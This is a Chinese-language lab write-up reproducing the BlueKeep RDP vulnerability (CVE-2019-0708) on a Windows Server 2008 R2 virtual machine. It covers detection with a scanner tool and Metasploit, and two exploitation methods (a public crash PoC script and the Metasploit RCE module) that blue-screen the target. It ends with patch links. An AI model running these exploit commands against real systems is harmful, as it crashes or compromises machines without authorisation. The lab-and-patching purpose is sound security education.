3389（RDP）CVE-2019-0708 漏洞复现

前言：小编也是现学现卖，方便自己记忆，写的不好的地方多多包涵，希望各位大佬多多批评指正。

---

漏洞概述

CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互，可能形成蠕虫爆发，影响堪比wannycry。
2019年09月07日，@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块，漏洞利用工具已经开始扩散，已经构成了蠕虫级的攻击威胁。
具体漏洞原理参考：漏洞原理

影响版本

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Windows 8和Windows 10及之后版本的用户不受此漏洞影响

---

环境搭建和漏洞复现

虚拟机：win2008 R2 （开启3389,允许任意版本连接）
虚拟机：kali

检测方法1：

RDP漏洞检测
提取码：1234
1.下载解压后可阅读使用手册。
2.打开cmd或者powershell运行，我这里是打开的poershell 输入命令：

.\0708detector.exe -t 192.168.0.114(目标ip) -p 3389

存在漏洞

检测方法2：

利用msf进行漏洞的检测

sudo msfconsole
search 0708  //搜索0708漏洞的路径位置
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  //进入扫描模块
set rhosts 192.168.0.114 (目标ip)  //设置目标IP
show options
run          //直接运行

存在漏洞

---

漏洞利用方法1：可导致目标系统蓝屏

CVE-2019-0708： POC地址

kali可直接下载该POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
ls
chmod +x crashpoc.py  //覆一个执行权限
python3 crashpoc.py 192.168.0.114 64

目标系统直接蓝屏重启

漏洞利用方法2： 可导致目标系统蓝屏

利用msf中的攻击模块

search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.0.114 (目标ip)
show targets   //查看目标
set target 5   //我选择5，一般选择4和5，具体选择看实际情况
show options
exploit   //攻击

目标系统直接蓝屏重启

---

漏洞修复

下载补丁：

Win7 sp1：
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Win08 R2：
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

参考文章：Timeline Sec 微信公众号漏洞复现文章合集